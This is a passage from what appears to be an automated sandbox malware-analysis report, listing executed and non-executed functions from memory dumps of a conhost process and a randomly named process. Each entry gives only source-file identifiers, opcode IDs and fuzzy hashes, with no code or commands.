                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5X_H
                                                                                    • API String ID: 0-3241812158
                                                                                    • Opcode ID: a3efa823efbc9a057847c4db072a6a6b902357297976feb54aea894e1653d8b0
                                                                                    • Instruction ID: 09a17595a79065cd43fac15dd23d07b01da61abb49745d76414847f0479c9b03
                                                                                    • Opcode Fuzzy Hash: a3efa823efbc9a057847c4db072a6a6b902357297976feb54aea894e1653d8b0
                                                                                    • Instruction Fuzzy Hash: 7291C1B1A18B898FEB59DF68C8657A9BFE1FB96310F4000BBD049D72D6CEB918118341
                                                                                    Function 00007FFD34400E43 Relevance: .2, Instructions: 172COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0a376d85f69bb68648fe516df68629606cc1cf7434626f029ecb19ea4befbfca
                                                                                    • Instruction ID: 52185b9df3efd21631ce3367bed27464cb3b7d614aaaf8e418ea0691ca7bc417
                                                                                    • Opcode Fuzzy Hash: 0a376d85f69bb68648fe516df68629606cc1cf7434626f029ecb19ea4befbfca
                                                                                    • Instruction Fuzzy Hash: B451B1B2A18B498BEB98DF5CD8657A9BFD1FB9A310F50017ED009D77D9CABA14118340
                                                                                    Function 00007FFD344008D0 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7K4
                                                                                    • API String ID: 0-1474283939
                                                                                    • Opcode ID: 8a9eedec7a602cf305067df3cb07c525186b64e78882342f36d1dd5cabcf6f2f
                                                                                    • Instruction ID: 8cf766954462ac2c846c0ff6d82fb0d9b4c46f2da932df846112a004383fb9f8
                                                                                    • Opcode Fuzzy Hash: 8a9eedec7a602cf305067df3cb07c525186b64e78882342f36d1dd5cabcf6f2f
                                                                                    • Instruction Fuzzy Hash: 42418A22B0D6950EE716B7BCB4B66F9BB90DF46325F1804BFD14DC71E7CD1968828284
                                                                                    Function 00007FFD34400960 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7K4
                                                                                    • API String ID: 0-1474283939
                                                                                    • Opcode ID: dded786d027cee81d38711fd8ffc1e278d610b4617c092c819dae53b734b1576
                                                                                    • Instruction ID: 97b72882ae64205046d4ed290a9425a0aed1ef212dc54159ec48a76b1415bfda
                                                                                    • Opcode Fuzzy Hash: dded786d027cee81d38711fd8ffc1e278d610b4617c092c819dae53b734b1576
                                                                                    • Instruction Fuzzy Hash: DD315721B1D9591FE725B3ACA4AA6F5B3C5DF4A325F1540BAE40EC31D7CC1DAC818284
                                                                                    Function 00007FFD34400998 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7K4
                                                                                    • API String ID: 0-1474283939
                                                                                    • Opcode ID: 06069cfc033b2e4813eb2becc0a1b3fc963aefeb664c70edefe36824753d8973
                                                                                    • Instruction ID: 6aee1e1915ce280858b0398e0b1981198259994f4a26a4584959660fb687cf16
                                                                                    • Opcode Fuzzy Hash: 06069cfc033b2e4813eb2becc0a1b3fc963aefeb664c70edefe36824753d8973
                                                                                    • Instruction Fuzzy Hash: 0B213720B189990FEB58E76C98AAA75B7C2EF9A314F0500BDE54EC32D7DC58AC418340
                                                                                    Function 00007FFD34400C25 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 563816ecba3afff70dae901d8a51f440606eca0c607462ccb871d4686ab75682
                                                                                    • Instruction ID: 7aab4e8cbe12285b666a0b0a32535bee17759c4d0a12c54148447a1e9166c9a8
                                                                                    • Opcode Fuzzy Hash: 563816ecba3afff70dae901d8a51f440606eca0c607462ccb871d4686ab75682
                                                                                    • Instruction Fuzzy Hash: A8210132B0D2898FE312DB68E8A51DDBFA0EF43324F1641B6C280DB196D978164AD781
                                                                                    Function 00007FFD34400C38 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 68f98372b25f3b7ed2586bfdd80a7739018767935b55e28f4ba937016d8a116d
                                                                                    • Instruction ID: 084cbd032153faa72abb11239866bce0f348fa120a0fcde99fa042a07cfbadb3
                                                                                    • Opcode Fuzzy Hash: 68f98372b25f3b7ed2586bfdd80a7739018767935b55e28f4ba937016d8a116d
                                                                                    • Instruction Fuzzy Hash: 4C11C231A0D7888FE702DB78E8A51DDBFB0EF43310F1645B6C184DB196D57816598781
                                                                                    Function 00007FFD34400C40 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9f719af44b1e62238a94b1d1544d133e15e6503658b0baddd5f63da1dc6222e2
                                                                                    • Instruction ID: 6a6a75c24465418be1ae3b320ad1a179e22d3f76a11a6e448c333bab2e1d8a9b
                                                                                    • Opcode Fuzzy Hash: 9f719af44b1e62238a94b1d1544d133e15e6503658b0baddd5f63da1dc6222e2
                                                                                    • Instruction Fuzzy Hash: 0501AD31A0E7888FE702DB68D8A419DBFB0EF43310F1645FAC580DB196D9381658C781
                                                                                    Function 00007FFD34405EF1 Relevance: .0, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8e61d3fb94b3a483446228939fb80f0d240d060cc6b208fee0da2c84fe3ebcb0
                                                                                    • Instruction ID: 318fd2abec1809c84384b22b5e5334d303ecfc8d36848b5fbb052f547bb3e59c
                                                                                    • Opcode Fuzzy Hash: 8e61d3fb94b3a483446228939fb80f0d240d060cc6b208fee0da2c84fe3ebcb0
                                                                                    • Instruction Fuzzy Hash: 40012160E1891E4AE7A4E718D8B57B8A190EF46300F5201B5D90EE3296ED6D6D50A740
                                                                                    Function 00007FFD3440171D Relevance: .0, Instructions: 40COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a6a42e17e609e66c2e3097432429c437116eb2c13d4c73acc1440de3bffe0bcc
                                                                                    • Instruction ID: 209f2fe0de12775b364f6e527ea58865760316f357c9e71e630447bc3ef8e553
                                                                                    • Opcode Fuzzy Hash: a6a42e17e609e66c2e3097432429c437116eb2c13d4c73acc1440de3bffe0bcc
                                                                                    • Instruction Fuzzy Hash: CEF0C232F0C5064BEB58B708C8A66F87392EB95350F060676D40EC72DADE9DAD1283C0
                                                                                    Function 00007FFD34405F11 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction ID: 753e9c1c2e9611ccd641fd62253276f84926cfd969e0a23f35f1748fa2e7877e
                                                                                    • Opcode Fuzzy Hash: 5e9778df4750084cb75aec90f917a2514228f83ca38fe3945c032ecbe2bdda72
                                                                                    • Instruction Fuzzy Hash: 2C018130A1840E8EEBA4FB04D8A5BF8B3A1EB55300F5140F9D90ED31A9EE7C69D19B41
                                                                                    Function 00007FFD34400C48 Relevance: .0, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c021bc4a3aa684d455242704b1f712e3a5be6fdee756fff754e8d521af93c0ff
                                                                                    • Instruction ID: 2304485bda03568240602f77040cfcb87fed4ccddd5676544f02675bab5769c1
                                                                                    • Opcode Fuzzy Hash: c021bc4a3aa684d455242704b1f712e3a5be6fdee756fff754e8d521af93c0ff
                                                                                    • Instruction Fuzzy Hash: A401B131A0E3888FD702DB78D89419DBFB0EF43314F1641FAC140DB1A6D9385A58C781
                                                                                    Function 00007FFD34400C50 Relevance: .0, Instructions: 34COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0e38f79f4c6f67e1b65adfd8974c9df803e0d247d73c471de7351d27d532f8ce
                                                                                    • Instruction ID: 9cd3b2061de38483f23fac508bf26a44155d90c250ef1a42012b3c2ad324cda8
                                                                                    • Opcode Fuzzy Hash: 0e38f79f4c6f67e1b65adfd8974c9df803e0d247d73c471de7351d27d532f8ce
                                                                                    • Instruction Fuzzy Hash: 43018F30A0E3888FE712DB74D49419DBFB0AF03304F1541EAC540DB196D9785A58C741
                                                                                    Function 00007FFD34400B87 Relevance: .0, Instructions: 30COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5206cafcdc3d55d1ebf569d031aca4f5246edcae550be1228116c3f1ac54b64d
                                                                                    • Instruction ID: b4f956ac19803fc95a75edd0a4537a43b1d972a3a70dfd3e295d64659687d5f9
                                                                                    • Opcode Fuzzy Hash: 5206cafcdc3d55d1ebf569d031aca4f5246edcae550be1228116c3f1ac54b64d
                                                                                    • Instruction Fuzzy Hash: 18E07D3232C54E8FDF06FB3CDC974A47B50EB4B21078700FAD008CB0A2C212685E8B42
                                                                                    Function 00007FFD34404265 Relevance: .0, Instructions: 22COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction ID: 446c19d5f34a84a6fd5641d9d5a5f5e8940cf57c90f3e9f5fd93d673dacb3524
                                                                                    • Opcode Fuzzy Hash: 7191c5d8c98392b8ebce349336f3d54e0e455686bb5dbd04537152c86a2d7850
                                                                                    • Instruction Fuzzy Hash: A7E01A30F0811A4BF798A348D8E13ADA2A4EB8A304F150478DB1ED33C9DDACAD509605
                                                                                    Function 00007FFD344006AD Relevance: .0, Instructions: 13COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction ID: e8faba09d9b46697ea9f3db097673d5c764bb2f6985da2eb409b2c5348bca1d0
                                                                                    • Opcode Fuzzy Hash: f3b8c8b3e0962f55aa8ec453ac382a4c1ea26ff2b2dd7e33b5edad8257a9d8e1
                                                                                    • Instruction Fuzzy Hash: 5EC00205F5A99B01A455336AA4A60ADE5415BC6625FD21572D70CD00999C8D20A5225A
                                                                                    Function 00007FFD344012D8 Relevance: .0, Instructions: 12COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction ID: 87bb2d1afbdb6299e4c2006d85d0693c179426fa63320165a2dca1347feceac5
                                                                                    • Opcode Fuzzy Hash: 8a6a5952e237a4aad34eef64097f3566ef20b7200f43b6a4cf4db5395f283f27
                                                                                    • Instruction Fuzzy Hash: B0C04C345518098FC948EB69C99591477A0FB1A215BD600A0E409C71B5D659DCD5DB41
                                                                                    Function 00007FFD344006D0 Relevance: .0, Instructions: 8COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction ID: f2d40f74121abed2b9625437c75ed249d18bc8c5f09c373a344d4817d11b8cd4
                                                                                    • Opcode Fuzzy Hash: 900fe70b819421745e4b4d75626da07f78d276a3c8375ed78851615b9ea59be2
                                                                                    • Instruction Fuzzy Hash: 30B00205D5684F01B45433BA59D6065F4505F46115FD61170D60DD019D9CCD55B52356

                                                                                    Non-executed Functions

                                                                                    Function 00007FFD344009B0 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000015.00000002.2864525714.00007FFD34400000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34400000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_21_2_7ffd34400000_conhost.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                    • API String ID: 0-1692736845
                                                                                    • Opcode ID: 154bb44e6f77374ea633bcc119611125e0fc94b07fd68a89fc34f4d7670a4877
                                                                                    • Instruction ID: bbd548dde306652e3bc7b8fd006d05db6bacfa96dfe7b77538fa37a2f16e89cc
                                                                                    • Opcode Fuzzy Hash: 154bb44e6f77374ea633bcc119611125e0fc94b07fd68a89fc34f4d7670a4877
                                                                                    • Instruction Fuzzy Hash: 4F51D303B0A46305E32333FD74620FEAB68DF92376B684677E14CEA0974D0E61D682E5

                                                                                    Executed Functions

                                                                                    Function 00007FFD343E0D48 Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 5Z_H
                                                                                    • API String ID: 0-3267294416
                                                                                    • Opcode ID: 146f8b0cc645723e337f4363dc020959b3fe49039102ce54fa48363bacb1aac2
                                                                                    • Instruction ID: 8a83ce696b02bdf86e511642a62576ab0f296e4be52dd46661c05a7b6be7f925
                                                                                    • Opcode Fuzzy Hash: 146f8b0cc645723e337f4363dc020959b3fe49039102ce54fa48363bacb1aac2
                                                                                    • Instruction Fuzzy Hash: 2891F6B2A19A994FEB99EB5C88A57E97FE1FB96310F0400BBC049D72D2DE7914118700
                                                                                    Function 00007FFD343E0E43 Relevance: .2, Instructions: 171COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b3a11c931049274633f1b09498fca1695dd96588818e3776e8f3abe4a2d9644a
                                                                                    • Instruction ID: a4cd3700ae56978bb6cf4575a0496d01511ca51bbdb389e39a251d351c997002
                                                                                    • Opcode Fuzzy Hash: b3a11c931049274633f1b09498fca1695dd96588818e3776e8f3abe4a2d9644a
                                                                                    • Instruction Fuzzy Hash: DB51C1B2A18A598BEB98DF5C88A57E97FE2FB9A310F54017FC009D37D1DAB914528700
                                                                                    Function 00007FFD343E08D0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7I4
                                                                                    • API String ID: 0-1709812513
                                                                                    • Opcode ID: d8f1fecdc614c36516423f8dac7c8f414728d23f4de8a91eca172132a6c36ed1
                                                                                    • Instruction ID: 44aab331974be2cef8372c206615b947adaebd0883e0e8201377ff5a0eb68b01
                                                                                    • Opcode Fuzzy Hash: d8f1fecdc614c36516423f8dac7c8f414728d23f4de8a91eca172132a6c36ed1
                                                                                    • Instruction Fuzzy Hash: DA412812B4E6650AE716F7BC64B62FA7B91DF46335B1804BFD18DC71D3CD2968C18281
                                                                                    Function 00007FFD343E0960 Relevance: 1.4, Strings: 1, Instructions: 116COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7I4
                                                                                    • API String ID: 0-1709812513
                                                                                    • Opcode ID: a9ba9499d48b1c7621d439046e532314d0c71544562c7d4ce8c427d2caa63ab6
                                                                                    • Instruction ID: c84dc586cab53d00e512c93e92b66fd7c1221156590a505982ef6d81cdab63b4
                                                                                    • Opcode Fuzzy Hash: a9ba9499d48b1c7621d439046e532314d0c71544562c7d4ce8c427d2caa63ab6
                                                                                    • Instruction Fuzzy Hash: 7C312912B0E9551BE759F7AC64A66F677D5DF49321F1800BBD50EC31D3CC2DAC814280
                                                                                    Function 00007FFD343E0998 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (7I4
                                                                                    • API String ID: 0-1709812513
                                                                                    • Opcode ID: 6533f2a97ebac74d2895e7df161b4e5c3dd6fd161d47b904f6e344e5dc3e3d5d
                                                                                    • Instruction ID: 0ddec21b70a68d04efd05d28525fecd6e944c6fb078bc2269bc66f99996e5a00
                                                                                    • Opcode Fuzzy Hash: 6533f2a97ebac74d2895e7df161b4e5c3dd6fd161d47b904f6e344e5dc3e3d5d
                                                                                    • Instruction Fuzzy Hash: 2D212B2171A9591FEB99F76C54AA6B577C2EB99310F1800BDE54DC32D3DD28AC818640
                                                                                    Function 00007FFD343E1171 Relevance: .1, Instructions: 96COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ec35f5c8b47dc6a88f9c9dbfb9ef6df2750763ac79da739d0c0babb5aa1d073a
                                                                                    • Instruction ID: e2bc4745250f033217148b2e81a5e5ce887e7d1568f31fc7f875f917f2b6b186
                                                                                    • Opcode Fuzzy Hash: ec35f5c8b47dc6a88f9c9dbfb9ef6df2750763ac79da739d0c0babb5aa1d073a
                                                                                    • Instruction Fuzzy Hash: 9F31B531A0D68A8FDF46EB64C8A59A97BF0EF17300B0905FBC009D7193DA7DA885C751
                                                                                    Function 00007FFD343E0C25 Relevance: .1, Instructions: 66COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 961c50ecccd3a12d2b19c0ff3538334bf9a6a743cc42c1b007991df2e60fdb71
                                                                                    • Instruction ID: 3179053f7924f98de58a280fd3995a62d8c3f2816112d9a674ec7d7833f2bf34
                                                                                    • Opcode Fuzzy Hash: 961c50ecccd3a12d2b19c0ff3538334bf9a6a743cc42c1b007991df2e60fdb71
                                                                                    • Instruction Fuzzy Hash: 9A210432B0E2998FE312EB6898A51DE7FB0EF43324F1845B7C280DB1D2D538158A9781
                                                                                    Function 00007FFD343E0C38 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7edb03e22994360e141e2f834e2a56849c75503850f835ca00ed74b6a8d5a8c5
                                                                                    • Instruction ID: 71633ac4c7688aee68c77d964617aacd735d19f0551b20aea7672a14208685e2
                                                                                    • Opcode Fuzzy Hash: 7edb03e22994360e141e2f834e2a56849c75503850f835ca00ed74b6a8d5a8c5
                                                                                    • Instruction Fuzzy Hash: 3B11C232A0E7988FE702EB78D8A42DE7FB0EF43310F1944B7C280DB192D53816898780
                                                                                    Function 00007FFD343E0C40 Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aa88565d334715e60adce184a27fcc1296be9004259e452469743d690529a750
                                                                                    • Instruction ID: 9b26fb760e8ece7771a2b95fe5cc28d312cacfc8ae7bc242b13dd73dc54dd2f1
                                                                                    • Opcode Fuzzy Hash: aa88565d334715e60adce184a27fcc1296be9004259e452469743d690529a750
                                                                                    • Instruction Fuzzy Hash: BF016136A0E7988FE702EB6898A41DE7FB0EF43314F1945E6C680DB192D53856899781
                                                                                    Function 00007FFD343E5EF1 Relevance: .0, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000016.00000002.2952051680.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_22_2_7ffd343e0000_tQESKTdysPpsVzUyXTE.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ad2d5dfb5c16a610bad244d69bcc03052962ac035d5815781a7d058aa8efec79
                                                                                    • Instruction ID: fe96c8fc097785a950fe6c19bcb675f5063115ce9d80eaccddae1558944e8ce1
                                                                                    • Opcode Fuzzy Hash: ad2d5dfb5c16a610bad244d69bcc03052962ac035d5815781a7d058aa8efec79
                                                                                    • Instruction Fuzzy Hash: 44012522E5D92D4AEBA4B75884B57BA6190AF46300F5401B5D90DE32D2DD3C6D816740
                                                                                    Function 00007FFD343E171D Relevance: .0, Instructions: 40COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
